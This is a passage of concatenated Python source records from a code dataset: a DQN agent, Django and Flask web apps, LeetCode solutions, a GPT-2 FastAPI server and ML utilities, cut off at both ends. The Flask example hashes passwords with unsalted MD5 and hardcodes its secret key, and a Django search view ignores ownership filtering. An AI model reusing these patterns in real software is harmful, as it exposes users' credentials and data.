If model does not exist, i.e. 
first frame, initialize model and uninitialized parameters\n if not self.model:\n # Needs to be in separate conditional in case model is defined manually\n self.model = DQN(len(information), self.choices, self.hidden_size, self.device)\n if not self.optimizer:\n self.optimizer = optim.Adam(self.model.parameters())\n self.prev_info = np.zeros(len(information))\n\n epsilon = self.epsilon_by_frame(self.frame)\n self.action = self.model.act(information, epsilon)\n\n # Decay Epsilon, update histories\n self.frame += 1\n self.replay.push(state=self.prev_info, action=self.action, reward=0, next_state=information, done=0)\n self.prev_prev = self.prev_info\n self.prev_info = information\n\n if len(self.replay) > self.batch_size:\n loss = self.compute_td_loss(self.batch_size)\n self.losses.append(loss.item())\n\n # Sometimes returns tensor, I don't know why?\n return int(self.action)\n\n def compute_td_loss(self, batch_size):\n state, action, reward, next_state, done = self.replay.sample(batch_size)\n\n state = autograd.Variable(torch.FloatTensor(np.float32(state))).to(self.device)\n next_state = autograd.Variable(torch.FloatTensor(np.float32(next_state))).to(self.device)\n action = autograd.Variable(torch.LongTensor(action)).to(self.device)\n reward = autograd.Variable(torch.FloatTensor(reward)).to(self.device)\n done = autograd.Variable(torch.FloatTensor(done)).to(self.device)\n\n q_values = self.model(state)\n next_q_values = self.model(next_state)\n\n q_value = q_values.gather(1, action.unsqueeze(1)).squeeze(1)\n next_q_value = next_q_values.max(1)[0]\n expected_q_value = reward + self.gamma * next_q_value * (1 - done)\n\n loss = (q_value - autograd.Variable(expected_q_value.data)).pow(2).mean()\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return loss\n\n def reward(self, reward):\n self.cum_rewards.append(self.prev_rwd + reward)\n self.prev_rwd = reward\n # Update replay buffer with done flag\n try:\n self.replay.buffer.pop()\n except IndexError:\n pass\n self.replay.push(self.prev_prev, self.action, reward, self.prev_info, 1)\n\n def store(self, filename):\n torch.save(self.model.state_dict(), 'dqn' + filename + '.pkl')\n","sub_path":"bin/models/agents/DQNAgent.py","file_name":"DQNAgent.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"154794083","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User, Group\nfrom .models import Project\nfrom .forms import ProjectModelForm\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n\n# Create your views here.\n\ndef HomeView(request):\n if request.user.is_authenticated:\n return render(request, 'index.html')\n else:\n return redirect('/accounts/login/')\n\n\n@login_required\ndef ProjectView(request): \n if request.user.groups.all()[0].name in ['Admin', 'Executive Director', 'Project Manager']:\n project_list = Project.objects.order_by('-id')\n else:\n project_list = Project.objects.filter(created_by=request.user.id).order_by('-id')\n\n paginator = Paginator(project_list, 10) # Show 10 contacts per page\n page = request.GET.get('page')\n projects = paginator.get_page(page)\n\n queryset = request.GET.get('q')\n total = project_list.count()\n if queryset:\n queryset = Project.objects.filter(Q(title__icontains=queryset))\n total = 
queryset.count()\n    context = {\n        'queryset': queryset,\n        'total': total,\n        'projects': projects\n    }\n    return render(request, 'dashboard/projects.html', context)\n\n\n@login_required\ndef ProjectCreateView(request): \n    form = ProjectModelForm(request.POST or None, request.FILES or None)\n    if form.is_valid():\n        obj = form.save(commit=False)\n        obj.created_by = request.user.id\n        obj.save()\n        messages.success(request, 'Project added successfully.')\n        return redirect('/projects/')\n\n    context = {\n        'form': form,\n        'valueBtn': 'Add',\n        'title': 'Create Project',\n    }\n    return render(request, 'dashboard/project_create.html', context)\n\n\n@login_required\ndef ProjectUpdateView(request, pk):\n    if request.user.groups.all()[0].name in ['Admin', 'Executive Director', 'Project Manager']:\n        project = get_object_or_404(Project, pk=pk)\n    else:\n        project = get_object_or_404(Project, pk=pk, created_by=request.user.id)\n    form = ProjectModelForm(request.POST or None, request.FILES or None, instance=project)\n    if form.is_valid():\n        obj = form.save(commit=False)\n        obj.updated_by = request.user.id\n        obj.save()\n        messages.success(request, 'Project was updated successfully.')\n        return redirect('/projects/')\n    context = {\n        'form': form,\n        'valueBtn': 'Update',\n        'title': 'Update Project',\n    }\n    return render(request, 'dashboard/project_create.html', context)\n\n\n@login_required\ndef ProjectDetailView(request, pk):\n    if request.user.groups.all()[0].name in ['Admin', 'Executive Director', 'Project Manager']:\n        project = get_object_or_404(Project, pk=pk)\n    else:\n        project = get_object_or_404(Project, pk=pk, created_by=request.user.id)\n    context = {\n        'title': 'Project Details',\n        'project': project\n    }\n    return render(request, 'dashboard/project_detail.html', context)","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"520784035","text":"# Standard phone keypad digit-to-letters mapping, looked up by dfs below\nKEYBOARD = {'2': 'abc', '3': 'def', '4': 'ghi', '5': 'jkl', '6': 'mno', '7': 'pqrs', '8': 'tuv', '9': 'wxyz'}\n\n\nclass Solution(object):\n    def letterCombinations(self, digits):\n        \"\"\"\n        :type digits: str\n        :rtype: List[str]\n        \"\"\"\n        res = []\n        self.dfs(digits,'',0,res)\n        return res\n\n    def dfs(self,digit,subset, index,res):\n        if index == len(digit):\n            res.append(subset)\n            return\n        for letter in KEYBOARD[digit[index]]:\n            self.dfs(digit,subset+letter, index+1,res)\n\n\n\na = Solution()\nprint(a.letterCombinations('23'))\n","sub_path":"verizon/leetcode17.py","file_name":"leetcode17.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"651232146","text":"import os\n\nfrom fastapi import FastAPI, status\nfrom fastapi.responses import PlainTextResponse\nfrom pydantic import BaseModel\nfrom transformers import GPT2Tokenizer, GPT2LMHeadModel\n\napp = FastAPI()\napp.device = os.getenv(\"TARGET_DEVICE\", \"cpu\")\napp.ready = False\n\n\n@app.on_event(\"startup\")\ndef startup():\n    app.tokenizer = GPT2Tokenizer.from_pretrained(\"gpt2\")\n    app.model = GPT2LMHeadModel.from_pretrained(\"gpt2\").to(app.device)\n    app.ready = True\n\n\n@app.get(\"/healthz\")\ndef healthz():\n    if app.ready:\n        return PlainTextResponse(\"ok\")\n    return PlainTextResponse(\"service unavailable\", status_code=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n\nclass Body(BaseModel):\n    text: str\n\n\n@app.post(\"/\")\ndef text_generator(body: Body):\n    input_length = len(body.text.split())\n    tokens = app.tokenizer.encode(body.text, return_tensors=\"pt\").to(app.device)\n    prediction = 
app.model.generate(tokens, max_length=input_length + 20, do_sample=True)\n return {\"text\": app.tokenizer.decode(prediction[0])}\n","sub_path":"test/apis/async/text-generator/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"165205079","text":"import datetime\nimport peewee\n\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash\nfrom functools import wraps\nfrom hashlib import md5\n\n# config\nDATABASE = 'tweepee.db'\nDEBUG = True\nSECRET_KEY = 'hin6bab8ge25*r=x&+5$0kn=-#log$pt^#@vrqjld!^2ci@g*b'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\ndatabase = peewee.Database(peewee.SqliteAdapter(), DATABASE)\n\n# model definitions\nclass User(peewee.Model):\n username = peewee.CharField()\n password = peewee.CharField()\n email = peewee.CharField()\n join_date = peewee.DateTimeField()\n\n class Meta:\n database = database\n\n def following(self):\n return User.select().join(\n Relationship, on='to_user_id'\n ).where(from_user=self).order_by('username')\n\n def followers(self):\n return User.select().join(\n Relationship\n ).where(to_user=self).order_by('username')\n\n def is_following(self, user):\n return Relationship.select().where(\n from_user=self,\n to_user=user\n ).count() > 0\n\n def gravatar_url(self, size=80):\n return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \\\n (md5(self.email.strip().lower().encode('utf-8')).hexdigest(), size)\n\n\nclass Relationship(peewee.Model):\n from_user = peewee.ForeignKeyField(User, related_name='relationships')\n to_user = peewee.ForeignKeyField(User, related_name='related_to')\n\n class Meta:\n database = database\n\n\nclass Message(peewee.Model):\n user = peewee.ForeignKeyField(User)\n content = peewee.TextField()\n pub_date = peewee.DateTimeField()\n\n class Meta:\n database = database\n\n\n# utils\ndef create_tables():\n database.connect()\n User.create_table()\n Relationship.create_table()\n Message.create_table()\n\ndef auth_user(user):\n session['logged_in'] = True\n session['user'] = user\n session['username'] = user.username\n flash('You are logged in as %s' % (user.username))\n\ndef login_required(f):\n @wraps(f)\n def inner(*args, **kwargs):\n if not session.get('logged_in'):\n return redirect(url_for('login'))\n return f(*args, **kwargs)\n return inner\n\ndef object_list(template_name, qr, var_name='object_list', **kwargs):\n kwargs.update(\n page=int(request.args.get('page', 1)),\n pages=qr.count() / 20 + 1\n )\n kwargs[var_name] = qr.paginate(kwargs['page'])\n return render_template(template_name, **kwargs)\n\n# custom filters\n@app.template_filter('is_following')\ndef is_following(from_user, to_user):\n return from_user.is_following(to_user)\n\n# request handlers\n@app.before_request\ndef before_request():\n g.db = database\n g.db.connect()\n\n@app.after_request\ndef after_request(response):\n g.db.close()\n return response\n\n# views\n@app.route('/')\ndef homepage():\n if session.get('logged_in'):\n return private_timeline()\n else:\n return public_timeline()\n\n@app.route('/private/')\ndef private_timeline():\n user = session['user']\n messages = Message.select().where(\n user__in=user.following()\n ).order_by(('pub_date', 'desc'))\n return object_list('private_messages.html', messages, 'message_list')\n\n@app.route('/public/')\ndef public_timeline():\n messages = Message.select().order_by(('pub_date', 'desc'))\n return 
object_list('public_messages.html', messages, 'message_list')\n\n@app.route('/join/', methods=['GET', 'POST'])\ndef join():\n if request.method == 'POST' and request.form['username']:\n try:\n user = User.get(username=request.form['username'])\n flash('That username is already taken')\n except StopIteration:\n user = User.create(\n username=request.form['username'],\n password=md5(request.form['password']).hexdigest(),\n email=request.form['email'],\n join_date=datetime.datetime.now()\n )\n auth_user(user)\n return redirect(url_for('homepage'))\n\n return render_template('join.html')\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST' and request.form['username']:\n try:\n user = User.get(\n username=request.form['username'],\n password=md5(request.form['password']).hexdigest()\n )\n except StopIteration:\n flash('The password entered is incorrect')\n else:\n auth_user(user)\n return redirect(url_for('homepage'))\n\n return render_template('login.html')\n\n@app.route('/logout/')\ndef logout():\n session.pop('logged_in', None)\n flash('You were logged out')\n return redirect(url_for('homepage'))\n\n@app.route('/following/')\n@login_required\ndef following():\n user = session['user']\n return object_list('user_following.html', user.following(), 'user_list')\n\n@app.route('/followers/')\n@login_required\ndef followers():\n user = session['user']\n return object_list('user_followers.html', user.followers(), 'user_list')\n\n@app.route('/users/')\ndef user_list():\n users = User.select().order_by('username')\n return object_list('user_list.html', users, 'user_list')\n\n@app.route('/users//')\ndef user_detail(username):\n try:\n user = User.get(username=username)\n except StopIteration:\n abort(404)\n messages = user.message_set.order_by(('pub_date', 'desc'))\n return object_list('user_detail.html', messages, 'message_list', user=user)\n\n@app.route('/users//follow/', methods=['POST'])\n@login_required\ndef user_follow(username):\n try:\n user = User.get(username=username)\n except StopIteration:\n abort(404)\n Relationship.get_or_create(\n from_user=session['user'],\n to_user=user,\n )\n flash('You are now following %s' % user.username)\n return redirect(url_for('user_detail', username=user.username))\n\n@app.route('/users//unfollow/', methods=['POST'])\n@login_required\ndef user_unfollow(username):\n try:\n user = User.get(username=username)\n except StopIteration:\n abort(404)\n Relationship.delete().where(\n from_user=session['user'],\n to_user=user,\n ).execute()\n flash('You are no longer following %s' % user.username)\n return redirect(url_for('user_detail', username=user.username))\n\n@app.route('/create/', methods=['GET', 'POST'])\n@login_required\ndef create():\n user = session['user']\n if request.method == 'POST' and request.form['content']:\n message = Message.create(\n user=user,\n content=request.form['content'],\n pub_date=datetime.datetime.now()\n )\n flash('Your message has been created')\n return redirect(url_for('user_detail', username=user.username))\n\n return render_template('create.html')\n\n\n# allow running from the command line\nif __name__ == '__main__':\n app.run()\n","sub_path":"example/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"150720459","text":"import os\nimport pickle\n\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split, 
StratifiedKFold\n\nfrom autokeras import constant\nfrom autokeras.preprocessor import OneHotEncoder\nfrom autokeras.search import HillClimbingSearcher, RandomSearcher\nfrom autokeras.utils import ensure_dir, reset_weights, ModelTrainer, has_file\n\n\ndef load_from_path(path=constant.DEFAULT_SAVE_PATH):\n \"\"\"Load classifier that has been saved before.\n\n The Classifier will be saved after fitting, so you can load it later instead of training again,\n which can save time.\n\n Args:\n path: The directory in which the classifier has been saved.\n\n Returns:\n The classifier loaded from the directory.\n \"\"\"\n classifier = pickle.load(open(os.path.join(path, 'classifier'), 'rb'))\n classifier.path = path\n classifier.searcher = pickle.load(open(os.path.join(path, 'searcher'), 'rb'))\n return classifier\n\n\nclass ClassifierBase:\n \"\"\"Base class of Classifier.\n\n ClassifierBase is the base class of all classifier classes, classifier is used\n to train and predict data.\n\n Attributes:\n y_encoder: An instance of OneHotEncoder for y_train (array of categorical labels).\n verbose: A boolean value indicating the verbosity mode.\n searcher: An instance of one of the subclasses of Searcher. It search different\n neural architecture to find the best model.\n searcher_type: The type of searcher to use. It must be 'climb' or 'random'.\n path: A path to the directory to save the classifier.\n model_id: Identifier for the best model.\n \"\"\"\n def __init__(self, verbose=False, searcher_type=None, path=constant.DEFAULT_SAVE_PATH):\n \"\"\"Initialize the instance.\n\n The classifier will be loaded from file if the directory in 'path' has a saved classifier.\n Otherwise it would create a new one.\n \"\"\"\n if has_file(os.path.join(path, 'classifier')):\n classifier = pickle.load(open(os.path.join(path, 'classifier'), 'rb'))\n classifier.searcher = pickle.load(open(os.path.join(path, 'searcher'), 'rb'))\n self.__dict__ = classifier.__dict__\n else:\n self.y_encoder = None\n self.verbose = verbose\n self.searcher = None\n self.searcher_type = searcher_type\n self.path = path\n self.model_id = None\n ensure_dir(path)\n\n def _validate(self, x_train, y_train):\n \"\"\"Check x_train's type and the shape of x_train, y_train.\"\"\"\n try:\n x_train = x_train.astype('float64')\n except ValueError:\n raise ValueError('x_train should only contain numerical data.')\n\n if len(x_train.shape) < 2:\n raise ValueError('x_train should at least has 2 dimensions.')\n\n if x_train.shape[0] != y_train.shape[0]:\n raise ValueError('x_train and y_train should have the same number of instances.')\n\n def fit(self, x_train, y_train):\n \"\"\"Find the best model.\n\n Format the input, and split the dataset into training and testing set,\n save the classifier and find the best model.\n\n Args:\n x_train: An numpy.ndarray instance contains the training data.\n y_train: An numpy.ndarray instance contains the label of the training data.\n \"\"\"\n x_train = np.array(x_train)\n y_train = np.array(y_train).flatten()\n\n self._validate(x_train, y_train)\n\n # Transform y_train.\n if self.y_encoder is None:\n self.y_encoder = OneHotEncoder()\n self.y_encoder.fit(y_train)\n\n y_train = self.y_encoder.transform(y_train)\n\n if self.searcher is None:\n input_shape = x_train.shape[1:]\n n_classes = self.y_encoder.n_classes\n self.searcher = self._get_searcher_class()(n_classes, input_shape, self.path, self.verbose)\n\n # Divide training data into training and testing data.\n x_train, x_test, y_train, y_test = 
train_test_split(x_train, y_train, test_size=0.25, random_state=42)\n\n        pickle.dump(self, open(os.path.join(self.path, 'classifier'), 'wb'))\n        self.model_id = self.searcher.search(x_train, y_train, x_test, y_test)\n\n    def predict(self, x_test):\n        \"\"\"Return predict result for the testing data.\n\n        Args:\n            x_test: An instance of numpy.ndarray contains the testing data.\n        \"\"\"\n        model = self.searcher.load_best_model()\n        return self.y_encoder.inverse_transform(model.predict(x_test, verbose=self.verbose))\n\n    def summary(self):\n        \"\"\"Print the summary of the best model.\"\"\"\n        model = self.searcher.load_best_model()\n        model.summary()\n\n    def _get_searcher_class(self):\n        \"\"\"Return searcher class based on the 'searcher_type'.\"\"\"\n        if self.searcher_type == 'climb':\n            return HillClimbingSearcher\n        elif self.searcher_type == 'random':\n            return RandomSearcher\n        return None\n\n    def evaluate(self, x_test, y_test):\n        \"\"\"Return the accuracy score between predict value and test_y.\"\"\"\n        y_predict = self.predict(x_test)\n        return accuracy_score(y_test, y_predict)\n\n    def cross_validate(self, x_all, y_all, n_splits):\n        \"\"\"Do the n_splits cross-validation for the input.\"\"\"\n        k_fold = StratifiedKFold(n_splits=n_splits, shuffle=False, random_state=7)\n        scores = []\n        y_raw_all = y_all\n        y_all = self.y_encoder.transform(y_all)\n        for train, test in k_fold.split(x_all, y_raw_all):\n            model = self.searcher.load_best_model()\n            reset_weights(model)\n            ModelTrainer(model, x_all[train], y_all[train], x_all[test], y_all[test], self.verbose).train_model()\n            score = model.evaluate(x_all[test], y_all[test], verbose=self.verbose)\n            scores.append(score[1] * 100)  # keep this fold's accuracy as a percentage\n        return np.array(scores)\n\n\nclass ImageClassifier(ClassifierBase):\n    \"\"\"Image classifier class inherited from ClassifierBase class.\n\n    It is used for image classification. 
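    (Usage sketch, assuming only the fit/predict API inherited from ClassifierBase above: clf = ImageClassifier(); clf.fit(x_train, y_train); y_pred = clf.predict(x_test).)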
It searches convolutional neural network architectures\n for the best configuration for the dataset.\n \"\"\"\n def __init__(self, verbose=True, searcher_type='climb', path=constant.DEFAULT_SAVE_PATH):\n super().__init__(verbose, searcher_type, path)\n","sub_path":"autokeras/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"422489623","text":"import sys\nfrom astropy.io import ascii\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\n# from astropy.convolution import convolve\nfrom astropy.stats import sigma_clip\nfrom scipy.optimize import curve_fit\nimport os\nimport astropy.io.fits as fits\nimport matplotlib.lines as lines\nimport string\n\nsigma_num=5\n\ndef fourier_sinusoidal_series_twoModes(x,a0,b0,a1,b1,a2,b2,freq,offset):\n result = a0*np.cos(2.*0*np.pi*freq*x) \\\n + b0*np.sin(2.*0*np.pi*freq*x) \\\n + a1*np.cos(2.*1*np.pi*freq*x) \\\n + b1*np.sin(2.*1*np.pi*freq*x) \\\n + a2*np.cos(2.*2*np.pi*freq*x) \\\n + b2*np.sin(2.*2*np.pi*freq*x) \\\n + offset\n return result\n\ndef clip_of_mask_flux(clip_flux):\n clip = sigma_clip( clip_flux, sigma=sigma_num, sigma_lower=None, sigma_upper=None, iters=5, cenfunc=np.ma.median, stdfunc=np.std, axis=None, copy=True)\n clipped = clip[np.logical_not(clip.mask)] - 1.\n return clipped\ndef clip_of_mask (clp_med_flux, x):\n clip = sigma_clip(clp_med_flux, sigma=sigma_num, sigma_lower=None, sigma_upper=None, iters=5, cenfunc=np.ma.median, stdfunc=np.std, axis=None, copy=True)\n clipped_x = x[np.logical_not(clip.mask)]\n return clipped_x\ndef med_flux (x):\n median = np.median(x)\n x_divide_med = x / median\n med_x = np.array(x_divide_med)\n return med_x\ndef amp_funct(x):\n min_value = min(x)\n max_value = max(x)\n med_value = np.median(x)\n ans = ((max_value - min_value) / med_value)\n return ans\n# ---------------------------------------\ndef Amp_with_Coeff(Extraction_Coeff, Delta_area, ):\n Delta_A = Delta_area\n Average_A = 0.2\n one = 1.\n Ext_coeff = Extraction_Coeff\n\n epsilon = (one / (Ext_coeff - one))\n Amplitude = (-1 * Delta_A) / (Average_A + epsilon)\n return Amplitude\n # print \"\\n -----------------------------------------------------------------\"\n # print \"\\n Amplitude with Extraction Coefficient: \\n\", Amplitude\n\n\ndef make_Amp_MiePython(Datafile):\n def Amp_x(Data_wavelength, Delta_a):\n Intensity = ascii.read(Datafile)\n wavelength = Intensity['Wavelength']\n extraction = Intensity['Transmission']\n Amp_Ext_Coeff = Amp_with_Coeff(extraction, Delta_a)\n Inter_Amp = np.interp(Data_wavelength, wavelength, Amp_Ext_Coeff)\n return Inter_Amp\n return Amp_x\n\ndef make_Amp_x(Datafile):\n def Amp_x(Data_wavelength, Delta_a):\n Intensity = ascii.read(Datafile)\n wavelength = Intensity['col1']\n extraction = Intensity['col2']\n Amp_Ext_Coeff = Amp_with_Coeff(extraction, Delta_a)\n Inter_Amp = np.interp(Data_wavelength, wavelength, Amp_Ext_Coeff)\n return Inter_Amp\n return Amp_x\n\ndef chi_squared_GOF(Mi, Yi, sigma_error_i):\n # the sum of the value minus of the expected value divided by the sigma of the expected all of it is squared\n # Chi-Squared (Goodness of Fit)\n # chi_squared = sum((Yi - Mi) ** two) / sum(sigma_error_i**two)\n two = 2\n chi_squared = sum(((Yi - Mi) ** two) / sigma_error_i ** two)\n return chi_squared\n\n\n","sub_path":"python 
code/def_funct.py","file_name":"def_funct.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"533138453","text":"# https://leetcode-cn.com/problems/sliding-window-median/\n\n\nclass Solution:\n def medianSlidingWindow(self, nums: List[int], k: int) -> List[float]:\n screen = sorted(nums[:k])\n res = [self.get_mudium(screen)]\n for i in range(len(nums) - k):\n screen.pop(self.binary_search(screen, nums[i]))\n insert_idx = self.binary_search(screen, nums[i+k])\n if screen and screen[insert_idx] < nums[i+k]:\n screen.insert(insert_idx+1, nums[i+k])\n else:\n screen.insert(insert_idx, nums[i+k])\n res.append(self.get_mudium(screen))\n return res\n\n\n def get_mudium(self, lst):\n length = len(lst)\n if length % 2 == 0:\n return (lst[length // 2 - 1] + lst[length // 2]) / 2\n else:\n return lst[(length - 1) // 2]\n\n def binary_search(self, lst, val):\n if len(lst) <= 1:\n return 0\n middle = len(lst) // 2\n if val == lst[middle]:\n return middle\n elif val < lst[middle]:\n return self.binary_search(lst[:middle], val)\n else:\n return middle + self.binary_search(lst[middle:], val)\n \n","sub_path":"2021-Feb/.ipynb_checkpoints/480-SlidingWindowMedian-checkpoint.py","file_name":"480-SlidingWindowMedian-checkpoint.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"248371633","text":"import os\n\nfrom cirrocumulus.envir import CIRRO_AUTH_CLIENT_ID, CIRRO_DB_URI, CIRRO_DATABASE, CIRRO_EMAIL, CIRRO_SERVE, \\\n CIRRO_FOOTER\nfrom cirrocumulus.launch import create_app\n\napp = None\n\nDEFAULT_DB_URI = 'mongodb://localhost:27017/'\nDEFAULT_DATABASE = 'cirrocumulus'\n\n\ndef cached_app():\n global app\n\n if app is None:\n app = create_app()\n\n # from flask_cors import CORS\n # CORS(app)\n configure()\n return app\n\n\ndef configure():\n from cirrocumulus.api import dataset_api\n from cirrocumulus.api import auth_api, database_api\n from cirrocumulus.no_auth import NoAuth\n auth_client_id = os.environ.get(CIRRO_AUTH_CLIENT_ID)\n db_uri = os.environ.get(CIRRO_DB_URI, DEFAULT_DB_URI)\n database = os.environ.get(CIRRO_DATABASE, DEFAULT_DATABASE)\n email = os.environ.get(CIRRO_EMAIL)\n os.environ[CIRRO_SERVE] = 'true'\n if auth_client_id is None:\n auth_api.provider = NoAuth()\n else:\n from cirrocumulus.google_auth import GoogleAuth\n auth_api.provider = GoogleAuth(auth_client_id)\n from cirrocumulus.mongo_db import MongoDb\n database_api.provider = MongoDb(db_uri, database, email)\n from cirrocumulus.parquet_dataset import ParquetDataset\n dataset_api.add(ParquetDataset())\n from cirrocumulus.anndata_dataset import AnndataDataset\n anndata_dataset = AnndataDataset('r' if False else None)\n dataset_api.add(anndata_dataset)\n\n\ndef main(argsv):\n import argparse\n import os\n parser = argparse.ArgumentParser(description='Run cirrocumulus server')\n parser.add_argument('--database', help='MongoDB database', default=DEFAULT_DATABASE)\n parser.add_argument('--db_uri', help='MongoDB database connection URI', default=DEFAULT_DB_URI)\n parser.add_argument('--email', help='Email address that server runs as')\n parser.add_argument('--auth_client_id', help='OAuth client id')\n parser.add_argument('-w', '--workers', dest='workers', help='The number of worker processes', type=int)\n parser.add_argument('-t', '--timeout', dest='timeout',\n help='Workers silent for more than this many seconds are killed and restarted', 
type=int, default=30)\n    parser.add_argument('-b', '--bind', dest='bind',\n                        help='Server socket to bind. Server sockets can be any of $(HOST), $(HOST):$(PORT), fd://$(FD), or unix:$(PATH). An IP is a valid $(HOST).',\n                        default='127.0.0.1:5000')\n    parser.add_argument('--footer', help='Markdown file to customize the application footer')\n\n    args = parser.parse_args(argsv)\n\n    bind = args.bind if args.bind is not None else '127.0.0.1:5000'\n    if args.auth_client_id is not None:\n        os.environ[CIRRO_AUTH_CLIENT_ID] = args.auth_client_id\n\n    if args.footer is not None:\n        os.environ[CIRRO_FOOTER] = args.footer\n\n    if args.email is not None:\n        os.environ[CIRRO_EMAIL] = args.email\n    if args.db_uri is not None:\n        os.environ[CIRRO_DB_URI] = args.db_uri\n    if args.database is not None:\n        os.environ[CIRRO_DATABASE] = args.database\n\n    if args.workers is not None:\n        workers = args.workers\n    else:\n        import os\n        workers = 2 * os.cpu_count()\n    run_args = [\n        'gunicorn',\n        '-b', bind,\n        '-w', str(workers),\n        '-t', str(args.timeout),\n        '-n', 'cirrocumulus-webserver',\n        'cirrocumulus.serve:cached_app()'\n    ]\n    import subprocess\n    subprocess.check_call(run_args)\n\n\nif __name__ == \"__main__\":\n    main(None)  # parse_args(None) falls back to sys.argv[1:]\n","sub_path":"cirrocumulus/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"349174949","text":"\"\"\"\nPREPARSED\n\nview_settings can be part of the body in a class or as a global setting. The\nonly difference is that in the latter, you need to specify full module paths.\n\n\nsettings style:\n{\n    'myapp.views.MyModel.myview': {\n        'admin': True,\n        'user': False,\n    }\n}\n\nclass-based view_settings:\n{\n    'myview': {\n        'admin': True,\n        'user': False,\n    }\n}\n\nPOSTPARSED\n\nIn all cases we get a lookup table where the permissions have been converted\nto a permission list. 
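(Each entry of that list is a (granted, role_checker) tuple, which is what parse_view_permissions below constructs.)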
For this the conversion makes use of the ROLES setting.\n\nE.g.\n\n{\n 'myview': [\n (True, is_admin),\n (False, is_user),\n ]\n}\n\"\"\"\n\nimport importlib\n\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\nimport django.core.exceptions as django_exceptions\n\nfrom rest_framework_roles.exceptions import Misconfigured\nfrom rest_framework_roles import decorators\n\n\ndef validate_config(config):\n if 'roles' not in config:\n raise django_exceptions.ImproperlyConfigured(\"Missing 'roles'\")\n\n # TODO: Uncomment once we support view_permissions to be defined in settings\n # if 'view_permissions' not in config:\n # raise django_exceptions.ImproperlyConfigured(\"Missing 'view_permissions'\")\n\n\ndef load_view_permissions(config=None):\n \"\"\"\n Load view permissioins from config\n \"\"\"\n if not config:\n from django.conf import settings\n config = settings.REST_FRAMEWORK_ROLES\n validate_config(config)\n view_permissions = config['view_permissions']\n if isinstance(view_permissions, str):\n view_permissions = import_string(view_permissions)\n return view_permissions\n\n\ndef load_roles(config=None):\n \"\"\"\n Load roles from config\n \"\"\"\n if not config:\n from django.conf import settings\n config = settings.REST_FRAMEWORK_ROLES\n validate_config(config)\n roles = config['roles']\n if isinstance(roles, str):\n roles = import_string(roles)\n return roles\n\n\ndef parse_roles(roles_dict):\n \"\"\"\n Parses given roles to a common structure that can be used for building the lookup\n\n Args:\n roles_dict: A dict where key is identifier of role, and value is a role_checker\n\n Output example:\n {\n 'admin': {\n 'role_name': 'admin',\n 'role_checker': is_admin,\n 'role_checker_cost': 50,\n }\n }\n \"\"\"\n d = {}\n for role_name, role_checker in roles_dict.items():\n d[role_name] = {}\n d[role_name]['role_name'] = role_name\n d[role_name]['role_checker'] = role_checker\n try:\n cost = role_checker.cost\n except AttributeError:\n cost = decorators.DEFAULT_COST\n role_checker.cost = cost\n d[role_name]['role_checker_cost'] = cost\n return d\n\n\ndef parse_view_permissions(view_permissions, roles=None):\n \"\"\"\n Transform all configuration into a lookup table to be used for permission checking\n\n Args:\n roles(dict): Dict where key is the role name and value is a dict with\n role attributes\n view_permissions(dict): E.g. {'view': 'myview', 'permissions':[]}\n\n Output example:\n {\n 'authentication.views.UserViewSet': {\n 'create': [\n (True, is_admin),\n (False, is_anon),\n ]\n }\n }\n \"\"\"\n lookup = {}\n if not roles:\n roles = load_roles()\n roles = parse_roles(roles)\n assert type(view_permissions) is dict, f\"Expected view_permissions to be dict. Got {view_permissions}\"\n assert type(roles) is dict, f\"Expected roles to be dict. 
Got {roles}"\n\n    # Check roles in permissions are correct before continuing\n    roles_in_view_permissions = set()\n    for permissions in view_permissions.values():\n        for role in permissions.keys():\n            roles_in_view_permissions.add(role)\n    for role in roles_in_view_permissions:\n        if role not in roles:\n            raise Misconfigured(f\"Role '{role}' given but such role not defined\")\n\n    # Populate general and instance checkers\n    for view_name, permissions in view_permissions.items():\n        lookup[view_name] = []\n        for role, granted in permissions.items():\n            lookup[view_name].append((\n                granted,\n                roles[role]['role_checker'],\n            ))\n\n    # Sort by cost\n    for view, rules in lookup.items():\n        rules.sort(key=lambda item: item[1].cost)\n\n    return lookup\n\n\ndef get_lookup():\n    roles = load_roles()\n    view_permissions = load_view_permissions()\n    return parse_view_permissions(view_permissions, roles)\n","sub_path":"rest_framework_roles/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"154040287","text":"import sys\nimport os\nsys.path.insert(0, \"..\")\nimport pickle\nimport numpy as np\nfrom 